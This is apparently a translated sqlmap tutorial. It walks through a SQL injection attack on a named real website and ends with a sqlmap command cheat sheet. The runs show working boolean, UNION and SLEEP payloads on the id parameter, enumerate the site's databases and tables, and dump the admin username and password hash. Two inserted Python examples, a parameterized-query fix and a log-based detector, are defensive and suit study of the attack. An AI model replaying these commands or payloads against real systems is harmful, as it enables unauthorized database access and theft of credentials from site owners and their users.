Note: the highlighted parts are the commands that were entered; the annotations are the information obtained from them.
1. -u url --dbs // enumerate the databases
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:23:20
[15:23:21] [INFO] resuming back-end DBMS 'mysql'
[15:23:21] [INFO] testing connection to the target url
[15:23:22] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e746d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[15:23:22] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[15:23:22] [INFO] fetching database names
[15:23:22] [INFO] the SQL query used returns 5 entries
[15:23:22] [INFO] resumed: "information_schema"
[15:23:22] [INFO] resumed: "gold"
[15:23:22] [INFO] resumed: "mysql"
[15:23:22] [INFO] resumed: "performance_schema"
[15:23:22] [INFO] resumed: "test"
available databases [5]:
[*] gold
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[15:23:23] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\output\www.lbgold.com'
[*] shutting down at 15:23:23
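The first run above shows why a single GET parameter is enough: the value of id is spliced into the SQL text, so "1826 AND 8515=8515" and "1826 AND 8515=8516" produce two different pages, and that difference is all a boolean-based blind scan needs. The following Python script is an added example, not the site's own code (the page shows no PHP) and not part of sqlmap. It uses an in-memory sqlite3 database as a stand-in for the MySQL gold database, so the time-based SLEEP() probe cannot be reproduced here; the article rows, the false-condition payload 8515=8516 and the function names are constructed for the example. The vulnerable handler sits beside the hardened one so the two fixes (type validation and a bound parameter) can be compared directly.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the page's 'gold' database
    (sqlite3 instead of MySQL; the boolean-based payload behaves the same)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO article VALUES (?, ?)",
        [(1825, "constructed article A"), (1826, "constructed article B")],
    )
    return conn


def show_article_vulnerable(conn: sqlite3.Connection, raw_id: str) -> List[Tuple[int, str]]:
    # The defect: the raw ?id= value is spliced into the SQL text, so anything
    # after the number is parsed as SQL instead of being compared as data.
    sql = f"SELECT id, title FROM article WHERE id={raw_id}"
    return conn.execute(sql).fetchall()


def show_article_hardened(conn: sqlite3.Connection, raw_id: str) -> List[Tuple[int, str]]:
    # Fix 1: validate the type before the value gets anywhere near SQL.
    if not raw_id.isdigit():
        raise ValueError("id must be a decimal integer")
    # Fix 2: bind the value as a parameter; the driver never parses it as SQL,
    # which also defeats the UNION and time-based payloads from the page.
    return conn.execute(
        "SELECT id, title FROM article WHERE id=?", (int(raw_id),)
    ).fetchall()


def blind_oracle(conn: sqlite3.Connection, raw_id: str) -> bool:
    """True when the vulnerable handler returns a row. This page-present /
    page-absent difference is the only signal a boolean-based blind scan uses."""
    return len(show_article_vulnerable(conn, raw_id)) > 0


def demo() -> dict:
    conn = make_db()
    true_payload = "1826 AND 8515=8515"   # payload reported by sqlmap on the page
    false_payload = "1826 AND 8515=8516"  # constructed: same shape, false condition
    result = {
        "plain": blind_oracle(conn, "1826"),
        "true_payload": blind_oracle(conn, true_payload),
        "false_payload": blind_oracle(conn, false_payload),
        "hardened_plain": show_article_hardened(conn, "1826"),
    }
    try:
        show_article_hardened(conn, true_payload)
        result["hardened_rejects"] = False
    except ValueError:
        result["hardened_rejects"] = True
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the script prints that the plain id and the true payload both return the article while the false payload returns nothing (the oracle sqlmap exploits), and that the hardened handler rejects the payload outright while still serving the legitimate request. The validation step is what makes the later --tables, --columns and --dump runs on this page impossible: no SQL fragment ever reaches the parser.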
2. -u url --tables -D database // enumerate the tables
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --tables -D gold
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:52:54
[15:52:54] [INFO] resuming back-end DBMS 'mysql'
[15:52:55] [INFO] testing connection to the target url
[15:52:56] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e746d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[15:52:56] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[15:52:56] [INFO] fetching tables for database: 'gold'
[15:52:58] [INFO] the SQL query used returns 5 entries
[15:52:59] [INFO] retrieved: "admin"
[15:53:00] [INFO] retrieved: "article"
[15:53:01] [INFO] retrieved: "class"
[15:53:02] [INFO] retrieved: "content"
[15:53:03] [INFO] retrieved: "djjl"
Database: gold
[5 tables]
+---------+
| admin |
| article |
| class |
| content |
| djjl |
+---------+
[15:53:04] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\output\www.lbgold.com'
[*] shutting down at 15:53:04
3. -u url --columns -T table -D database // enumerate the columns
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --columns -T admin -D gold
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:58:10
[15:58:10] [INFO] resuming back-end DBMS 'mysql'
[15:58:10] [INFO] testing connection to the target url
[15:58:12] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e746d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[15:58:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[15:58:12] [INFO] fetching columns for table 'admin' in database 'gold'
[15:58:13] [INFO] the SQL query used returns 3 entries
[15:58:14] [INFO] retrieved: "id","int(2)"
[15:58:15] [INFO] retrieved: "user","char(12)"
[15:58:16] [INFO] retrieved: "password","char(36)"
Database: gold
Table: admin
[3 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| id | int(2) |
| password | char(36) |
| user | char(12) |
+----------+----------+
[15:58:17] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\output\www.lbgold.com'
[*] shutting down at 15:58:17
4. -u url --dump -C column -T table -D database // dump the column values
(1) Dump the password column
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C password -T admin -D gold
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:02:05
[16:02:05] [INFO] resuming back-end DBMS 'mysql'
[16:02:05] [INFO] testing connection to the target url
[16:02:06] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e746d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[16:02:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[16:02:06] [INFO] fetching entries of column(s) 'password' for table 'admin' in database 'gold'
[16:02:08] [INFO] the SQL query used returns 1 entries
[16:02:09] [INFO] retrieved: "ecoDz4IPZGYNs"
[16:02:09] [INFO] analyzing table dump for possible password hashes
Database: gold
Table: admin
[1 entry]
+---------------+
| password |
+---------------+
| ecoDz4IPZGYNs |
+---------------+
[16:02:09] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\www.lbgold.com\dump\gold\admin.csv'
[16:02:09] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\output\www.lbgold.com'
[*] shutting down at 16:02:09
(2) Dump the id column
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C id -T admin -D gold
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:10:22
[16:10:22] [INFO] resuming back-end DBMS 'mysql'
[16:10:22] [INFO] testing connection to the target url
[16:10:23] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e746d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[16:10:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[16:10:23] [INFO] fetching entries of column(s) 'id' for table 'admin' in database 'gold'
[16:10:24] [INFO] the SQL query used returns 1 entries
[16:10:25] [INFO] retrieved: "1"
[16:10:25] [INFO] analyzing table dump for possible password hashes
Database: gold
Table: admin
[1 entry]
+----+
| id |
+----+
| 1 |
+----+
[16:10:25] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\www.lbgold.com\dump\gold\admin.csv'
[16:10:25] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\output\www.lbgold.com'
[*] shutting down at 16:10:25
(3) Dump the user column
[[email protected]~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C user -T admin -D gold
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:10:48
[16:10:48] [INFO] resuming back-end DBMS 'mysql'
[16:10:48] [INFO] testing connection to the target url
[16:10:49] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1826 AND 8515=8515
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e746d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1826 AND SLEEP(5)
---
[16:10:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[16:10:49] [INFO] fetching entries of column(s) 'user' for table 'admin' in database 'gold'
[16:10:49] [INFO] the SQL query used returns 1 entries
[16:10:50] [INFO] retrieved: "ssb"
[16:10:51] [INFO] analyzing table dump for possible password hashes
Database: gold
Table: admin
[1 entry]
+------+
| user |
+------+
| ssb |
+------+
[16:10:51] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\www.lbgold.com\dump\gold\admin.csv'
[16:10:51] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\output\www.lbgold.com'
[*] shutting down at 16:10:51
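Every run in steps 1 to 4 re-uses the same three injection points, and each of them leaves a distinct shape in the web server's access log: a numeric tautology (AND 8515=8515), a UNION ALL SELECT NULL column probe, and a SLEEP() delay, all sent with sqlmap's default User-Agent. The following Python script is an added example, not part of the original notes and not part of sqlmap: it parses constructed IIS-style (W3C) log lines, URL-decodes the query string, flags each request that carries one of the page's payload shapes or the sqlmap User-Agent, and counts flagged requests per client address. The field layout, the date, the client IPs and the clean final request are assumptions made for the example; the three payloads are the ones sqlmap reported above.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed IIS-style (W3C) access-log lines. Field order assumed here:
# date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status.
# IIS writes '+' in place of spaces inside the User-Agent field. The date,
# the client IPs and the clean request in the last line are made up; the
# three payloads are the ones sqlmap reported on this page.
SAMPLE_LOG = """\
2013-05-12 15:23:21 GET /article_show.php id=1826 203.0.113.7 sqlmap/1.0-dev+(http://sqlmap.org) 200
2013-05-12 15:23:21 GET /article_show.php id=1826%20AND%208515%3D8515 203.0.113.7 sqlmap/1.0-dev+(http://sqlmap.org) 200
2013-05-12 15:23:22 GET /article_show.php id=1826%20LIMIT%201,1%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20CONCAT(0x3a6e746d3a,0x74437972455a4d666447,0x3a747a793a),%20NULL%23 203.0.113.7 sqlmap/1.0-dev+(http://sqlmap.org) 200
2013-05-12 15:23:22 GET /article_show.php id=1826%20AND%20SLEEP(5) 203.0.113.7 sqlmap/1.0-dev+(http://sqlmap.org) 200
2013-05-12 15:24:01 GET /article_show.php id=1827 198.51.100.9 Mozilla/5.0+(Windows+NT+6.0)+Firefox/20.0 200
"""

LOG_FIELDS = ["date", "time", "method", "uri_stem", "uri_query",
              "client_ip", "user_agent", "status"]

# One payload shape per injection type shown in the sqlmap output above.
RULES = [
    # 'AND 8515=8515': a tautology whose two sides are the same number
    ("boolean_tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    # 'UNION ALL SELECT NULL, ...': column-count probing and data extraction
    ("union_select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    # 'AND SLEEP(5)': MySQL time-based blind probe (BENCHMARK is the other form)
    ("time_delay", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one W3C line into named fields; returns None for malformed lines."""
    parts = line.split(" ")
    if len(parts) != len(LOG_FIELDS):
        return None
    rec = dict(zip(LOG_FIELDS, parts))
    # Decode the query string so encoded payloads ('%20AND%20') are matchable.
    rec["decoded_query"] = unquote_plus(rec["uri_query"])
    rec["user_agent"] = rec["user_agent"].replace("+", " ")
    return rec


def analyze(rec: Dict[str, str]) -> List[str]:
    """Names of every rule the request trips, in RULES order."""
    hits = [name for name, pattern in RULES if pattern.search(rec["decoded_query"])]
    if "sqlmap" in rec["user_agent"].lower():
        hits.append("sqlmap_user_agent")
    return hits


def scan(log_text: str) -> List[Tuple[str, str, str, List[str]]]:
    """(time, client_ip, uri_stem, hits) for every flagged request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = analyze(rec)
        if hits:
            findings.append((rec["time"], rec["client_ip"], rec["uri_stem"], hits))
    return findings


def per_client(findings: List[Tuple[str, str, str, List[str]]]) -> Counter:
    """Flagged requests per client IP. One address sending boolean, UNION and
    time-based probes at the same parameter within seconds is the characteristic
    sqlmap pattern, so the per-IP count is a sensible alert key."""
    return Counter(ip for _, ip, _, _ in findings)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for when, ip, stem, hits in results:
        print(f"{when} {ip} {stem} -> {', '.join(hits)}")
    print(per_client(results))
```

Against the sample, four of the five requests are flagged and all four come from one address; the Firefox request with a plain integer id is not. The User-Agent check is the weakest signal, since sqlmap can be told to send any agent string, which is why the payload-shape rules run on the decoded query rather than on the raw log field.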
5. sqlmap command reference
For MSSQL and Access, dump the tables directly; you know the rest.
On BT5 the command has to be prefixed with python.
sqlmap.py -u url --dbs // enumerate the databases
sqlmap.py -u url --current-db // show the current database
sqlmap.py -u url --current-user // show the current user
sqlmap.py -u url --users // view the user privileges
sqlmap.py -u url --tables -D database // enumerate the tables
sqlmap.py -u url --columns -T table -D database // enumerate the columns
sqlmap.py -u url --dump -C column -T table -D database // dump the column values
sqlmap.py -u url --dump --start=1 --stop=3 -C column -T table -D database // dump entries 1 to 3 of the column
The options can also be given in the reverse order.
sqlmap.py -u url // test whether the URL is injectable
sqlmap.py -u url --is-dba -v // checks whether the current database user is a DBA
sqlmap.py -u url --users -v 0 // enumerates the database users
sqlmap.py -u url --passwords -v 0 // retrieves the database users' passwords
sqlmap.py -u url --privileges -v 0 // checks the current privileges
sqlmap.py -u url --dbs -v 0 // lists all the databases
sqlmap.py -u url --tables -D 'database' // enumerate the tables
sqlmap.py -u url --columns -T 'table' -D 'database' // enumerate the columns
sqlmap.py -u url --dump -T 'table' --start 1 --stop 4 -v 0 // this queries rows 2 to 4 of the table
sqlmap.py -u url --dump-all -v 0 // dump everything